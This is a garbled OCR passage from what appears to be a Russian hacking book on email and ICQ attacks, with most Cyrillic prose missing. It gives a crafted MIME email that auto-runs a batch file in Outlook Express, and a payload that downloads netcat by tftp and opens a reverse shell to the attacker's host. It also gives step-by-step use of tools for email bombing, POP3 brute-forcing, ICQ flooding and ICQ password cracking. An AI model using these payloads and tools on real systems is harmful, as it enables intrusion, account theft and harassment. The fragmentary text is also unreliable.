, , .
IE Address Javascript.
URL. HTML IE 6, ; , IE 6 HTML
. !
, ,
Web- - . , ,
, .
- ?
, , SSL ( TSL)
Web-.
XakuHzSSL
SSL (Secure Sockets Layer - ) ,
Web.
, .. , -
, . IE , , SSL,
http:// https://.
Web,
, .
8. Web
127
, - . , /
.
- : - Web
. -, , , ,
Web- SSL-. , ,
, . -,
Web,
128- ( , D). IE ,
IE 56-
,
Web-.
- ? : . , . , [3]
SSL, IE 4: SSL , . ,
, IE, IE, .
, [3].

, , ,
, Web . .
, , , Web.
,
Web-
. .
-,
,
128
-
, , .
.
, ,
.
Windows 2000/XP, 14.
- Web-, -
, .
:
. , ,
SSL.
Web-
.
.
, , ,
. .
, . , , ,
, . .
Web - .
,
. , , , , Web . ,
- Web
, , - , , .
, ,
4 IE Netscape, , 5 6 .
, ,
.
9.
Xakutig
- ,
. , ,
-
, , .
, . ,
,
, Web-. , .
kogoM
, Web-. WWW,
, ,
, 1, , , . , - , ... , ,
, .
[3]
. ,
, Web- , . ,
, . . .
1
FIDO. mail ().
5-1687
130

.
: _@_, _ - () , _ . , , , .
SMTP,
POP IMAP, , ,
TCP/IP.
SMTP (Simple Mail Transfer Protocol -
) .
POP (Post Office Protocol - ) - .
IMAP (Interactive Mail Access Protocol -
) - ,
POP, .
:
, , , vasia@email.com
, . ( ).
, , , vasia,
, , petia , ,
petia@post.com, POP ( IMAP) email.com
( ).
email.com .
:

, petia.
, .

,
email.com DNS
post.com petia (
).
9.
131
petia POP ( MAP) , , .

, .
XakuH2
,
: -, ; , . POP 3
() , . - SSL/TSL (
). -
, (
17).
- ,
SMTP. , , SMTP, . (, Outlook Express), , , , .
.

,
.
, , ,
, ,
.
, ,
. ,
- .
,
,
,
. , .
5'
132
, .
- .. ,
, .
- , ,
,
, ,
IE, (
). - , ,
, ,
, , .
- . , , ,
-, . ,
-
, , , ,
Windows, ,
, .

, -
.
, .
, .., ,
, , ,
, .

RFC 2822.
, ASCII . ,
( ), , ASCII ( ). <CRxLF>, ( 13) ( 10).
. .
:
_:
:
9.
133
Subject:
, (Subject) () . , , :
Subject:

...
- 998 ,
78 .
, , .
From
, :
vasia@email.com, : "Vasia Lohov " (vasia@email.com).
Reply
-
, From.
, , .., From .
Subject
Date
, , Sat.16 Jun 2003 15:34:17+1000
Message-ID
, , :
<3.0.4.44.30445445754533.0035@email.com>
Received
, .
, , Outlook Express,
-
, . ,
.
134

.
. - TCP/IP Ethernet, Windows 2000/XP. :
Windows 2000 Server Sword-2000 - 1.0.0.1
Windows XP AIex- IP- 1.0.0.5
Windows 2000 1-1 IP- 1.0.0.7
sword.net,
: Sword-2000 sword2000.sword.net., AIex- - alex-3.sword.net,
1-1 - alex-1 .sword.net. 1-1 AIex- :
1-1 kolia@alex-1.sword.net,
AIex- - , petia@alex-3.sword.net.
, - , - .
, , , . ,

. ,
.
-
, .
9.1 ,
JMail 5.01.
9.1.
Received: from alex-l.sword.net [1.0.0.7] by alex-3.sword.net
with ESMTP
(SMTPD32-5.01
+ 0200
EVAL)
id
A4A7502B6;
Thu,
16
Jan
2003
14:25:11
Received: from alex-1 [ 1 . 0 . 0 . 7 ] by alex-l.sword.net

(SMTPD32-5.01 EVAL)
id A76080152; Thu, 16 Jan 2003
+0200
Message-ID: <008601c2bd52$6682eeeO$07000001@sword.net>
13:28:32
9.
135
From: "kolia" <kolia@alex-l.sword.net>

To: <petia@alex-3.sword.net>
Subject: Congratulations
Date: Thu, 16 Jan 2003 13:28:32 +0200
MIME-Version: 1.0
Content-Type: text/plain; charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
X-RCPT-TO: <petia@alex-3.sword.net>
X-UIDL: 7
Status: U
Happy New Year!
, , - , Content-Type, , ( ).
(Multipurpose Internet Mail
Extensions - ).
MIME ,
.
MIME
, ,
, , , , MIME
: Content Type:, Content-Transfer-Encoding: Content-Disposition:. MIME MIME-Version:, MIME,
- 1.0,
:
MIME-Version:1.0
Content-Type :
Content-Type: /; =; ...
/ ,
MIME MIME-. , MIME- .
1 36
text/plain
text/html
( HTML). :
1=_/)(/7_/
, charset=koi8-r ;
charset
us-ascii, .. ASCII.
image/jpeg
image/gif
image/gif
audio/x-realaudio
() , , Content-Type:
video/mpeg
Content-Type:
video/mpeg
video/quicktime
, , Content-Type: video/mpeg
application/postscript
application/msword
application/zip
application/octetstream
( application)
, ,
octet-stream --
:
Content-Type: octet-stream
multipart/mixed
multipart/related
multipart/alternative
multipart - MIME-, , ,
. mixed, related, alternative , , , , .
Content-Type-Encoding :
Content-Type-Encoding:
,
, .
7bit - us-ascii, 8-bit - ,
binary - , quoted-printable -
, base64 - ,
Base64 (RFC-2045).
Content-Disposition
, , , .
:
Content-Disposition: inline; filename="image.gif"
9.
137
inline , , filename
, - .
attachment , .
, , , , .
.
omnpaBka
,
MS-DOS, . ( ) , Outlook Express.
, . , 9.1,
X-Mailer: , , ,
Outlook Express 5.00. , ,
, - 5.00 ,
, .
(Notepad) 1-, 9.2,
Attack-hello.txt.
9.2.
-
hello sword-2000.sword.net
mail from: <petia@alex-3 . sword.net>
rcpt to: <kolia@alex-l . sword. net>
data
subject: Attack
MIME-Version: 1.0
Content-Type:
multipart /related;
type="multipart/alternative11;
boundary = " 1 "
Content-Type: multipart/alternative; boundary =" 2
--2
Content-Type: text/html; charset="iso-8859-l"
Content-Transfer-Encoding: quoted-printable
138
Content-Disposition: inline;
<HTML>
<HEAD>
</HEAD>
<BODY >
<IFRAME src=3Dcid:THE-CID height=3DO width=3DO>

This message uses a character set that do not supported
by the Internet Service. Please disregard. <BR</IFRAME>
</BODY>
</HTML>
Content-Type: audio/x-wav; name= "hello. bat"

Content-Transfer-Encoding : quoted-printable
Content- ID: <THE-CID>
echo off
dir c:\
echo "Your system has a problem! "
pause
quit
,
MIME- , 9.2, -1 -2 .
MIME .
- SMTP, SMTP, - , ,
. hello ,
sword-2000.sword.net. mail from , , rcpt to
, 9.1. Received:. data, .
9.
139
9.2 ,
1, MS-DOS
: .
,
HTML, IFRAME
:
<IFRAME src=3Dcid:THE-CID height=3DO width=3DO>
This message uses a character set that do not supported
by the Internet Service. Please disregard.<BR</IFRAME>
src=3Dcid:THE-CID, , Content-ID: <THE-CID>.

, - .
- MS-DOS:
echo o f f
dir c : \
echo "Your system has a problem!"

pause
- audio/x-wav - ..,
,
MS-DOS. , ,
5.00 ( 5.50 6!)
, , ,
!
. , MS-DOS:
type attack-hello.txt | nc -vv sword-2000.sword.net 25
- . (http://www.atstake.com), , netcat . ; , netcat attack-hello.txt

SMTP- sword-2000.sword.net, 25.
, , , , , MS-DOS
(. . 9.1).
140
2^1 - Outlook Express
Outlook Express

|...â
i (^?
L...^}
C:\>echo off
.
, : C01B--81FO
:\
06.12.2002
22.12.2002
13.01.20
06.01.2003
i . 06.01.2003
! 16.01.2003
''.
26.12.2002
12.01.2003
[; I, ||
11:57
<DIR>
13:02
<DIR>
11:07
<DIR>
14:42
<DIR>
14:54
<DIR>
12:24
<DIR>
12:57
<DIR>
14:12
<DIR>

8
1 358 456
"Vour system has problem?"

IFT
. 9.1.
, MS-DOS,
, - ,

:\ Your system has a problem ( ). , ,
-
MS-DOS!
, ,
. , -
, , ,
. , - - , -.

,
: -
(, ) , .
- -
.
9.
_ 141
TFTPD32, - .
- netcat.
MS-DOS, , netcat, . .
attack-tftp.txt MIME-, 9.3.
9.3.

hello alex-l.sword.net
mail from: <petia@alex-3 .sword. net>
rcpt to: <kolia@alex-l. sword. net>
data
subject: Attack
MIME- Version : 1.0
Content-Type:
multipart/related;
type="multipart/alternative";
boundary ="1"
X_Priority: 3
X-MSMail-Priority: Normal
X-Usenet : 1
Content-Type: multipart/alternative; boundary =" 2 "
2
Content-Type: text/html; charset="isc 8859-1"
Content -Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY
bgColor=3D#ffffff>
<IFRAME src=3Dcid:THE-CID height=3DO width=3DOx/IFRAME>
, . <BR>
. <BR>
</BODY>
</HTML>
Content-Type: audio/x-wav; name=" attack. bat"

Content -Transfer-Encoding : quoted-printable
142 _
Content-ID:
<THE-CID>
start / /WAIT tftp -i alex-3.sword.net get nc.exe

C: \winnt\system32\nc .exe
start /B nc.exe -d -e cmd.exe alex-3.sword.net 2002
quit
:
start / /WAIT tftp -i alex-3.sword.net get nc.exe C:\winnt\system32\nc.exe
start /B nc.exe -d -e cmd.exe alex-3.sword.net 2002
. MS-DOS MS-DOS
( / start) ( /WAIT start). MS-DOS
tftp, ( put)
( get). ( tftp Windows 2000/XP.) tftp ( -i) nc.exe alex-3.sword.net c:\winnt\system32 .
- netcat,
cmd.exe
- netcat, 2002.
. attack-tftp.txt - 9.3, .
Alex- TFTPD32,
TFTP, .. , TFTP.
TFTPD32 , Windows 2000/XP,
UNIX, TFTP ,
tftp ,
, tftp - .
, TFTPD32 ,
. 9.2.
TFPD32 . Base Directory
( ) nc.exe,
Server interface ( ) IP-
, , - Alex-. . 9.2, TFPD32 69 TFTP
.
9.
143
TFTP032 by Ph. Joumn

Base Directory
[CAtestSnetcat
Serve!inleiface [ 1 0 0 5
Current Action
[listening on port E9
About
Help
Settings
Puc. 9.2. TFTP - TFPTD32

MS-DOS - :
nc -vv -L - 2002
listening on (any) 2002 ...
netcat, , 2002, .
. MS-DOS
1-1
SMTP- sword-2000.sword.net :
type attack-tftp.txt | nc -vv sword-2000.sword.net 25
Outlook Express 5.00
( 1-1
MS-DOS), TFTPD32 , . 9.3.
. TFTPD32 by Ph. Jounin
Base Directoi)i | C:\test\netoat
Server interface [1 Q.rj.5
Connection received from 1.0.0.7 on port 1125
Read request (or file <nc.exe>. Mode octet
<nc.exe>: sent 118 blks, 5932 bytes in 1 s. 0 blk resent
Current Action
About
[Listening on
Settings
\_
Help
. 9.. !
144
MS-DOS,
netcat,
1-1 (. 9.4).
" Command Prompt - nc -vv -L -p 2002
C:\test\netcat>nc -uv -L -p 2002
listening on l&nyH 2002 ...
DNS fwd/rev mismatch: ftLEX-1 T = fiLEX-l.sviord.net
connect to [1.0.0.51 from ALEX-1 [1.0.0.71 1274
Microsoft Windows 2000 [ 5.00.21951
<C> , 198S-1999.
C:4>ipconfig
ipconrig
IP Uindous 2000
Ethernet :
DNS
IP-
. . . . . . . .

1.0.0.7
255.0.0.0
. 9.4. -
, - , . 9.4
ipconfig, IP- ,
. - , ,
- , 1-1
! - !
- ,
,
.
BcmaBku koga
[4]:
.
, - .
.
.
.
.
9.
145

[4] , . , ,
. , 2000
, GMT.
,
IMAP. Service Pack 1 Windows 2000.
, ,
.vcf ( vCard) .asx ( Media Player).
[3] - , .

- , , - ..
. ,
, ,
,
-, MS Office (, - !) . - ,
,
.
, -
!
AokaAbHbix
, , , ,
,
. ,
, Web-, . HTML , ,
, , ,
8. Web- (Georgi Gunninski) http://www.guninski.com.
146
Omkpbimue
,
- - , -,
.
, , hacker.com, netcat
:
nc -n -L - 80 -t -w 1 < attack.bat
netcat TCP 80,

attack.bat .
netcat,
HTML, :
<raroe src=telnet:-f
%20"Document%20aiid%20Setting\aAll%20\Users\start%20inenu\
programs\startup\start.bat"%2Ohacker.com%20 8 0 >
,
, .
telnet, telnet,
, Windows 2000, SFU 2.0 (Service for Unix - Unix). f:, telnet.
telnet SFU :
(Address) IE URL telnet:-f%20\filename.txt%20 host
IE - filename.txt. , telnet ,
start.bat
attck.bat. start.bat - !
- telnet SFU 2.0,
. , ,
.
\I\I\I\IM\I

, , -
9.
147
Microsoft - , . .
, , Web-, ,
Hotmail Microsoft (http://www.msn.com) Yahoo
(http://www.yahoo.com). Web-, ,
, , Web .
Web-, .
, , , , -,
, Received:
(. 9.1) ,
( ). -, WWW
.
WWW ,
, , .
, Web- , ActiveX - . 8.
...
, ? , ,
:
, .
.
- , , .

.
, , .
-
. 1 - .
10.

9 , ,
, .
, , , ,

. ,
, ,
,
,
.

, . , , 9, .
, , , ,
,
... , - !
- (, , , 1,
). ,
,
,
! ,
. ? -
-
- .
( Flood - ,
) ( Spam - , . Spam ). (..
10.
149
), , ,
.
, SMTP-. Death & Destruction
Email Bomber ( & ) 4.0,
DnD (http://www.softseek.com/Utilities/VBRUN_Files/).
, . ,
DnD, .
Avalanche - . Avalanche DnD, .
. 10.1 DnD 4.O.
-inixi
Clones
Headers
Session
Random Listi
Send bomb to:

Say bomb is from:
Message Subject: |
Message Body:
Send Bomb;
Edil Headers
Abort
Mailing Lists
Window
Extiat
Help
Email Bombing is rarely damaging

the target but is always
damaging to smtp hosts. I do NOT
condone mailbombing as it
causes problems for SysAdmins of
71 0 Randomly Change | EditLisI
servers. I did not make this
program for people to blast away
I 0 Randomly Change [ Edit List | at each othei. PLEASE use it
responsibly, and if you HAVE to
email bomb, then please use the
option to fandomly switch servers
in between messages; as it
lightens the loads on the server.
Have fun and don't ruin a good
sysadmins time by flooding his
server!
Clear
Clone
Selling
SMTP Host: I
8
Spoof Host: I
Ed
"Se'"e'fel
of messages to send:
o Neve, endng bomb
|| Remember to use the Edit Headers option'
Puc. 10.1. DnD

DnD, , 1-1
, . , ( ).
150

.
.

DnD Settings
(), DnD (. . 10.1).
DnD Settings ()
:
> SMTP Host ( SMTP) , SMTP-, . SMTP Sword-2000.sword.net.
> Spoof Host ( )
, .
, .
Randomly Change ( ) ,
SMTP.
> SMTP-,
Edit Server List ( ).
Random Server List ( ),
. 10.2.
if Random Server List
|orca.esd114.w | [mw.highwayVc
||stjohns.edu
malasada.lava.
interconnect.ne| |hoiizons.net
lpfessenter.com | [cybefhighway.nj
1 mail, sisna.com j why.net
[widowrnaker.col |clubmet.metrob|
|wwa.com
| clinet.fi
| (cablefeginaco [
Jsoi.hyperchal.c | |dagoberUz.uni-
|space.net
| |maple.nis.net
ltka.com
|clubmet.metfob| |[Mvl.nel
ih2000.net
| [nyx1Q.cs.du.ed
| | plx.com
|
|
. 10.2. SMTP-
SMTP-
Random Server List ( ) .
Submit ().
Size of Bomb ( ) (. 10.1) :
10.
151
# of messages to send ( )
.
10.
Never ending bomb ( ) .
, . , . E-Mail bomb ( ).
> Send Bomb to: ( :) , kolia@alex-1.sword.net.
> Say bomb is from: (, :) ( , ) . From ().
, Randomly Change ( ) , .
Edit List ( ).
> : () , , .
> Message Subject ( ) .
, Randomly Change ( )
.
Edit List ( ).
> Message Body: ( :) .
> , Random () - Message Body
( )
. , -
.
Abort () ,
Clear () - E-Mail bomb ( ).
.
> Send Bomb ( ) . ,
. 10.3.
152
Number of messages to be sent:
10
Number of messages sent so far:
10
Number of messages left to send:
Time when bomb started:
13:36:52
Time when bomb finished:
13:35:57
...SMTP Spy j| Mote: This only applies to the main bomber form.
Bomb completed!
11111
l
l
I
Puc. 10.3. Countdown ()

, Countdown () , 10
, . , SMTP, , SMTP Spy ( SMTP)
SMTP Spy ( SMTP), . 10.4.
250 hello sword-2000.sword.net
250 ok
250 ok its for <kolia@alex-3.sword.net>
354 ok. send it; end with <CRLF>.<CRLF>
250 Message queued
gnore "Command unrecognized" and "need MAIL first". As long as

you get a "message accepted for delivery" its fine. I Close SpyI
Puc. 10.4. SMTP- !

SMTP Spy ( SMTP) DnD
( DnD SMTP- - !) .
SMTP ( ), Email bomb ( ) (. 10.1) -
MIME- Headers (),
Edit Headers ( ) . 10.5.
153
10.
Check the box and Ihen fill in the information that wit! appear in the
headers under that category; 01 uncheck the box to remove it from
the headers.
X-Maiter:
X-URL:
X-Sender:
X-Date:
Return Path:
References:
Priority:
X-Aulhentication Warning
Generate IP |
Custom
21.43.153.80 ]
Ok
JTedGilsdorf
Cleat
Cancel
Puc. 10.5. MIME

, ,
MIME , 9.
- DnD
,
, .
Amaka
, DnD , . , ,
.
, Clone ()
E-Mail bomb ( ) Bomber Spawn 1 (
), . 10.6.
, Bomber Spawn 1 ( ) E-Mail bomb ( )
-
SMTP-. ,
SMTP-. - - , !
- .
154
Bomber Spawn I
Send bomb to:

Say bomb is from:
0 Randomly Change
Message Subject:
Random
Message Body:
SMTP Server:
|, | 0 Randomly Change
Abort
Clear
[Status
[Messages Sent! [5_
Puc. 10.6.
, , ( - ).
> , DnD Clones * Load Multi Clones ( *
). Number of clones ( ),
. 10.7
Number of clones
How many clones do you want to load?
L
Puc. 10.7.
- !
> Number of clones ( ) ( 5-6) .
Bomber Spawn
( ), 1 -
. Send Bomb ( )
. -
!
10.
155
cnuckaMu paccbwku
! , - ,
! DnD
, , Mailing lists ( ). Subscribe
joe lamer to mailing list ( ),
. 10.8, ,
Euro Queer ( ), Mormons (), Family Medicine
( ) -
!
Subscribe joe lamei to a mailing list!
Subscribe your enemy to a mailing list even worse then a mailbomb!

More lists coming next version..sorry for the smalt quantity this time.
My apologies for the bad usability but I will use checkboxes instead of option boxes
next version..
Jewish List
Child Parenting
Targets email address:
Digital Queers
Gay Quakers
Targets first name:
jj0hn
Mormons
Christianity
Targets last name:
|Doh
Gay/Lesbian
womanism
Lesbians over 40
Bi Australians
Euro Queer
Blind people
Family Medeeine
Allergies
Subscribe em
Puc. 10.8. DnD

DnD
. Target
Email Address ( ), Subscribe em
() - . , .

,
, DnD , ,
, . ,
Extras * Pword generator ( * ).
Randomic Password Generator ( ), . 10.9.
156
, How many characters? (

?) ( - 8 )
: Use Both ( ) - , Use numbers ( ) - Use letters ( ) - . -
, ,
.
( Randomic Passwoid Geneiatoi
Just click to generate a random password. Choose how long
you want it to be by the number of characters.
How many characters? |ig |
Use Both Use numbers Use letters
S2j9e1m5p8i
Generate
Close
Clear box
Puc. 10.9.
Extras () -
SMTP- ( SMTP Remote (
SMTP)), ( Raw Port
( )). , ( , SMTP).
Other Tools ( )
.
- , , .
, - ;
. ,
, . , ( ). , .
k

. , ,
- (
10.
157
IMAP) , .
- .
Brutus Authentication Engine Test 2
( Brutas , 2),
Brutus AET2 (http://www.hobie.net/brutus). . 10.10
Brutus,
, FTP, HTTP, Telnet
NetBus.
1 X Biulus - 2 - www.hoobie.net/biutus - (January 2000)
File
Tools
Target
_
|l 27.0.0.1
.
Poit [
T-.I-.I-,~. ^
Help
|
Connections 1 10
'
Type |
meout
[ | Start | Stop [dear
yiHIIIIWfni IU
|_J Use Proxy [ pare |
|i Modify sequence!]
Try to stay connected for fiJnlimite \*\ attempts
0 UseUsemame
Pass Mode I Word List \*\
[] Single User
User File jusers.txt
1 | Browse |
Pass File
[words.txt
| | Browse |
Positive Authentication Results

Target
I Username
I Type
[ Password
Located and installed 1 authentication olua-ins
II
UZ
II
TiAout
Reject
AuthSeq
III*
Throttle Quick ICi
j.
Puc. 10.10. Brutus

,
Brutus ( 12
Brutus IIS). , alex-1.sword.net,
kolia. , ,
- ,
.
.
> Brutus - 2 (. 10.10) Target () , alex-1 .sword.net.
> () ,
.
158
>- Connection Options ( ) Use Proxy ( ),

-
.
> Authentication Options ( ) Single User ( ) -
.
> User file ( ) , .. - kolia.
> Pass Mode ( ) Brute Force
( ). Brutus ,
. 10.11.
1 X Biulus - AET2 - www.hoobie.nel/biutus - fJanuaiv 20001
File
Tools
arget | alex-1 . sword, net

/-.
Help
Type|POP3
|" | | Start | Stop [dear
.-
Timeout ^
i 10 fj Use Proxy | Dare |

Connections
Port |110
P.,-..-.^.n .
| Modify sequence |
Try to stay connected for Unlimite l^l attempts
0 Use Username
0 S'n3le User
UseilD
jkolia
Pass Mode JBrute Force j" J |j Range j| | OfettibOed |

] JBiowse|
PawFte
iKl
||.|

Target
Type
MUVMVIIIIIIMi|.miL
II
J Password
^^^_
^^^
V%
I
I Username
Timeoul
II
Reject
AulhSeq
III*
Thro8
Quick K
Puc. 10.11. Erutus POPS

Range (). Range () Brutus Brute Force Generation (Brutus - ),
. 10.12.
10.
159
Digits only
Min Length
|3
Lowercase Alpha
Length |4
Uppercase Alpha
OK
Mixed Alpha
Cancel
Alphanumeric
Full Keyspace
Custom Range [etaoinsrhldcumfpgwybvkxjqzl 234567890! |
Puc. 10.12.
Brutus - Brute Force Generation (Brutus -
) - ,
, . ,
- , Min Length ( ) 3, Max Length ( ) - 4. , Digits only
( ).
.
> Start () Brutus - 2
Brutus - 2. . 10.13.
X Biulus - 2 - www.hoobie.net/biutus - (January 20001
File
Tools
Help
Target [alex-1. sword net
[>j | Start | Stop [ Clear)
Type [POP3
onnection Options
Port [110
Connections
10
! 10 Timeout
Use Proxy | Define
-POPS Options
[ Modify sequence |
Try to stay connected for
l^] attempts
-Authentication 0 ptiom
7| Use Usemame
UserlD
Pass Mode | Brute Force j^] | Range 11 Distributed
j Single User
[kolia

Target
alex-1.sword.net
| Type
I Username
kolia
I Password
0007
Positive authentication at alex-1 . sword, net with U ser : kolia Password : 0007 1 0997 attempts
Timeout
10997
J|U:kolia P:0000
Reject
AuthSsq
Throttle Quick Kl
||37 Attempts per second
Puc. 10.13. !
160
Positive Authentication Results (

) , kolia - 0007.
, Brutus 10997 alex-1.sword.net (
11000). 5 Pentium 3
1000 ,
Ethernet 10 /.
,
, Brutus (
). -, , , ( 8 !),
, (, &$ ..).
!
Brutus - Brute Force Generation (Brutus - ) 8 ,
Full Keyspace ( ). Start
() Brutus - 2
- 6 095 689 385 410 816 - , !
12 ?
, , ,
(., , [10]). Brutus,
Pass
Mode ( ).
( 100 000), ,
. , password, parol, MyPassword
- Web- -
.
-,
,
, Ethernet, 30-50 / (
). -
. -
, - , ,
,
.

. , , , , ,
10.
161
, . .

- , .
IIS Brutus 12 ,
- . ,
, . , , ,
- , -
! :
!. .

, , ,
. 1, , , , . - ,
, , ,
. ,
- ( - ),
.
, - ,
. . ,
TFTP 1-1 , 1-1 . , TFTP
, .
TFTP
, ,
, . , , , ,
6- 1687
162
,
.

. , ,
( ) . ,
, , Web- - .. ( ,
). . - , , , IP-.
. - , ..
,
- , ,
. , ..
, -
-
. , 2002 ., , ,
.
Web-. . . ...
(
). Web-, ,
?, .
, , ?, ?,
? . -
, ,
, ,
. , , , , ,
. ,
, - ,
, .
repa_parenaia, - !
10.
163
- . , , ,
,
. - , , ,
- , . .
, - .
,

. , (
) , -
!
.
,
8 ( 12) , , .
,
DnD .
.
, - , Norton Antivirus
MacAfee VirusScan.
,
- PGP Desktop Security.
, .
, - , ,
, .

- - , .
11.
XakuHzlCQ
ICQ Intelligent Call Query, . ICQ [--] : I Seek You - ; , ICQ .
ICQ ,
1998 Mirabilis,
( 40 ) AOL.
ICQ ,
ICQ ,
, . , , ICQ,
,
. , , - .
ICQ ,
ICQ.
ICQ , ICQ, ,
http://www.ICQ.com, http://mirabilis.com. ICQ - ICQ , , 1998, 1999, 2000,
2002, ICQ 2003. ICQ
UDP, 4000, -
TCP, .
, ICQ, UIN (Unique Identification Number -
). UIN -
ICQ , .
, ICQ?
ICQ ,

. , ? .
. ICQ
165
AcbkuHbi
-,
ICQ,
. -, ICQ ICQ
.
, ICQ, :
, UIN ,
, . , ICQ , - ICQ . , , - .
ICQ-, , IP-
ICQ-, , . , , DoS, 13 . ,
IP- ICQ, -
, ICQ- .
!
, ICQ-,
. ,
,
, - ,
.
ICQ,
Mirabilis
. ICQ, ICQ ,
.
,
.
166
ICQ
,
, ,
, ,
.

, /. .
. - ,
ICQ
ICQ ICQ. ,
ICQ ; , ICQ- (,
LameToy
www.mirabilis.com). , ( )
,
.
. Sword-2000
ICQ Groupware Server, Alex-
ICQ Groupware Client, UIN, 1001, 1-1 ,
UIN, 1003. ICQ Groupware
http://www.icq.com.
ICQ, ICQ
Groupware, ,
, 1. - , ICQ - ,
ICQ
. ICQ
ICQ-,
ICQ-, ICQ- .
11. ICQ
167
UIN
UIN ICQ- ULN ICQ, , UIN . UIN

. ,
, - .
- - , .
, , .
( ) LameToy for ICQ
(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .
LameToy for ICQ.
. 11.1 , LameToy
for ICQ.
LameToy For Icq [DBKILLER]
Send I
Slop | | Updatel | Menu | | Hide ||
Loser -
|UINtt|1001
Passwdl
]
Exit
-Setting
1 |Nick |
lErnaill
II URL |hlto://
Messsage
v|g Engine: Successfully sent 7 message 1
Puc. 11.1. LameToy for ICQ (DBKILLER)

ICQ

LameToy for ICQ (DBKILLER) -
Send (). , Setting
() Loop () ,
. TJIN,
UIN# - Ran (Random- ). ,
, , , .
168
, ICQ-,
- , UIN UIN
. , ICQ (ICQ99a
ICQ99b) . DB-
( - ), DB Data Base - , ,
DB NewDB. LameToy ,
DB killer ( DB)
Setting ().
ICQ, .
, , LameToy, UIN , , , System Messenger - ICQ Team (http://www.icqinfo.ru/soft_icqteam.shtml), ICQ Sucker
.
IP- ICQ-knueHma
DoS ( ) ,
- . ,
, , Advanced ICQ IP
Sniffer - ICQ Team ( Web, , http://www.icqinfo.ru/softjcqteam.shtml).
. 11.2 Advanced ICQ IP Sniffer.
_ falxll
Advanced ICQ IP Sniffer
You UIN (207685174
| Passwofd:|"""""
UIN to check |1 234567891

Check
| ||
Clear list
About
Server
Timeout. Try again.
Ext IP:
Status:
| TCP Rag
Int IP: |
TCP Port: |0
| TCP Version: |0
Puc. 11.2. - IP- ICQ

IP- ICQ UIN, Advanced ICQ IP
Sniffer ICQ, UIN . , , Your UIN ( UIN) Password
() Advanced ICQ IP Sniffer ( IP
ICQ). Check ()
. ICQ
169
, ICQ
UIN , Info
() .
, Info () . 11.2
, ( ) IP- ICQ,
TCP-, ICQ . , , Ext IP ( IP), Int
IP ( D?) TCP Port ( TCP). ,
ICQ- ( ).
ICQ, Advanced IP ICQ Sniffer,
ICQ server's address and port ( ICQ),
Server () . 11.3.
llCQ server's address and port
Address: |icq.mitabilis.com
Port
[4000
| | OK |
|
Cancel
Puc. 11.3. ICQ server's address and port

( ICQ)
ICQ server's address and port (
ICQ) Mirabilis
ICQ - 4000. ,
/ IP- /
.
ICQ-
ICQ, , , ICQ-,
ICQ-
ICQ. , , . ,
ICQ, ICQ-MultiWar
(http://www.paybackproductions.com/), - ICQ Flooder
(. 11.4).
170
File
Victim's address: 127.0.0.1
El Randomly generated UIN
Apparent source UIN:
No. of Messages: |1
Message:
Eat this!
ICQ Flooder 1.2 Copyright (C) 1998 dph-rnan and Implant Man
Puc. 11.4. ICQ

ICQ Flooder, .
> Victim's address ( ) -
ICQ.
> ICQ-port ( ICQ) TCP.
> , UIN .
:
UIN - Randomly generated UIN
( UIN), UIN UIN.
UIN - Apparent source UIN
. ( UIN ) UIN, ICQ .
> No. of Messages ( ) ICQ-.
v Message () (- , ).
> Send! () .
- , ICQ, , - , ,
http://mht.hut.ru/icq/icq.html,
( , , -
. ICQ
171
ICQ , ). ICQ - ,
, , -
!
ICQ
IGQ,
ICQ, ,
. ,
, .
brute
force - , ,
.

.
, , ICQ subMachineGun v1.4 (http://icq.cracks.ru/best.shtml), . 11.5.
ICQ SubMachineGun v1.4 by uD
File Settings About
(c):UD. Moscow 2001
Puc. 11.5. ICQ subMachineGun

UIN ICQ
172
ICQ ICQ subMachineGun

.
> ICQ subMachineGun.
> Settings * Connections&Cracking (&). , . 11.6.
[ Cracking ]
0
0
0
0
Stop if successful...
Make log of cracked uins
Reconnect if timeout
Cut passwds length to 8 digits
set timeout:
relogin :
times
Cancel
OK
Puc. 11.6. UIN

> icq server ( ICQ) ICQ,
, ICQI.mirabilis.server.
> port () 4000.
> Cracking ()
:
Stop if successful ( )
ICQ.
Make log if cracked uins ( UIN) ICQ.
Reconnect if timeout (
) ICQ
.
Cut password length to 8 digits (
8- ) 8- .
> set timeout ( ) 15 .
. ICQ
173
> relogin ( ) ICQ

3.
ICQ subMachineGun
UIN . .
> ICQ subMachineGun Bruteforce
( ) UIN. .
Single () UIN, .
Single () UIN.
> UESf,
(...) Making victims list ( ),
. 11.7.
100000
100100
100200
100300
100400
100500
100600
100700
100800
100900
101000
101100
101200
101300
101400
101500
101600
101700
101800
Starch
101900
102000
Clear
102100
102200
Cancel
102300
Hint: use De! to remove uins from list
Puc. 11.7. UIN

Making victims list ( ) Range
() , , UIN ( - 100000) ( 900900).
step () UIN ( - 100).
Generate () UIN;
.
174
, Generate ()
- UIN, , , ..
Add () UESF .
>
UIN,
Open () UIN ( UIN ).
> - UIN ,
I0**18]. Clear () UIN ( ).
UTN,' .
.
>
ICQ subMachineGun Bruteforce ( )

. .
Single () , .
Single () .
> ,
(...) Make passlist (
), . 11.8.
. 11.8.
Make passlist ( )
.
. ICQ
175
> Open ()
( ).
- ,
ICQ.
> Generator ()
Add (). , .
> , I08'"'!. Clear ()
( ).
> , .
.
Force (). , ICQ
subMachineGun v1.4 (. 11.9).
OICQ SubMachineGun vl.4 by uD
File _ Settings About
'_ Bruteforce ]
2076851747
FT] 0 Single
~| Single
,cotn:4000
51747 pass
51747 pass
i 1747 pass
J1747 pass
J1747 pass
J1747 pass
J1747pass
51747 pass
J1747 pass
pass,..timeaut,re!ogin
pass... timeout.retogin
pass... timeout.relogin
pass... timeout.
password.,. timeout,refogin
password... timeaut,re login
password... timeout.re login
password,,, timeout.
Puc. 11.9. -

ICQ subMachineGun v1.4,
UIN, ( , . 11.9 ). , , 15 , ICQ.
176
- 45
, ( ). ,
, , , , .. - .
...
ICQ-kpkep
-, , ICQ -
. ICQ , ICQ . ,
? - ! ,
? ,
ICQ- , .
,
.
?
,
Windows.
,
2 . , ICQ ,
ICQ. ICQ-, , ElcomSoft
Advanced ICQ Password Recovery (http://www.elcomsoft.com).
, .
. 11.10 Advanced ICQ Password Recovery.
-Status Window
31.01.200314:12:05- ACQPR1.0 launched, registered version
1 () 2000 Olegjjgriunovand Andy Malvshev. ElcomSofl Co. L
Puc. 11.10.
ICQ .dat
177
. ICQ
